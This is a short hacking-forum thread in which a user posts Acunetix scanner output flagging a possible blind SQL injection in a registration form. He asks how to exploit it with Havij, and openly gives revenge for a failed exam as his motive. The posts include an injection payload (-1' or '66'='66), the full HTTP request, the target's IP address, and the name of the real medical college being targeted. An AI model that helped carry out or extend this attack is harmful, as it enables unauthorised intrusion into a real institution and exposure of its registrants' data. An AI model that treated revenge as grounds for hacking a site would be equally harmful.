Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
992Proxy
  • 0

Locked Help needed plz !!

dR.fAn0

Asked by INACTIVE dR.fAn0 ,

 Share

Question

dR.fAn0 Little Hacker

INACTIVE dR.fAn0

Posted
Posted (edited)

Hi guys, i've found a vulnerability in a site by using site crawler in Acunetix . . . Its says the link may be vulnerable to BLIND SQLI . . . Here is the data i got

 

This vulnerability affects /onlinereg/rtmc_bank/.

Discovered by: Scripting (Blind_Sql_Injection.script).

Attack details

URL encoded POST input rtmc_reg_no was set to -1' or '66'='66

 

View HTTP headers

Request

POST /onlinereg/rtmc_bank/ HTTP/1.1

Content-Length: 60

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=42sq0klh22o83cjq9mf8fa7du5; dynatree-active=; dynatree-focus=; dynatree-expand=; dynatree-select=

Host: 111.68.*.* (Cant expose the site)

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Accept: */*

 

rtmc_reg_no=-1%27%20or%2066%20%3d%20%2764&verify_submitted=YResponse

HTTP/1.1 200 OK

Date: Fri, 29 Jun 2012 13:08:10 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

Content-Length: 7594

Connection: close

Content-Type: text/html; charset=UTF-8

 

 

Can anyone plz help how to exploit this by using havij or some other tool . . .

Any help would be appreciated :huh:

Edited by dR.fAn0
Link to comment
Share on other sites

2 answers to this question

Recommended Posts

  • 0
dR.fAn0 Little Hacker

INACTIVE dR.fAn0

Posted
  • Author
Posted (edited)
Vulnerable link? i cant know if the link is vulnerable or not if i havent it..

 

Thanks bro, Actually the site is

This is the hidden content, please

 

They failed me in my exam of Post graduation :paranoico:

Although the competition was tough selected only 27 candidates amongst 12400 !! . . . :GE52EK:

Now i have to study again for 4months :ruletaoff:

 

I'm posting the whole vulnerability as derived from Acunetix

 

 

 

Vulnerability description

This script is possibly vulnerable to SQL Injection attacks.

 

SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters.

 

This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.

This vulnerability affects /onlinereg/rtmc_bank/.

Discovered by: Scripting (Blind_Sql_Injection.script).

Attack details

URL encoded POST input rtmc_reg_no was set to -1' or '66'='66

 

View HTTP headers

Request

POST /onlinereg/rtmc_bank/ HTTP/1.1

Content-Length: 60

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=42sq0klh22o83cjq9mf8fa7du5; dynatree-active=; dynatree-focus=; dynatree-expand=; dynatree-select=

Host: 111.68.111.5

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Accept: */*

 

rtmc_reg_no=-1%27%20or%2066%20%3d%20%2764&verify_submitted=YResponse

HTTP/1.1 200 OK

Date: Fri, 29 Jun 2012 13:08:10 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

Content-Length: 7594

Connection: close

Content-Type: text/html; charset=UTF-8

 

 

View HTML response

 

 

College of Physicians & Surgeons Pakistan

This is the hidden content, please

Edited by dR.fAn0
Link to comment
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to question listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.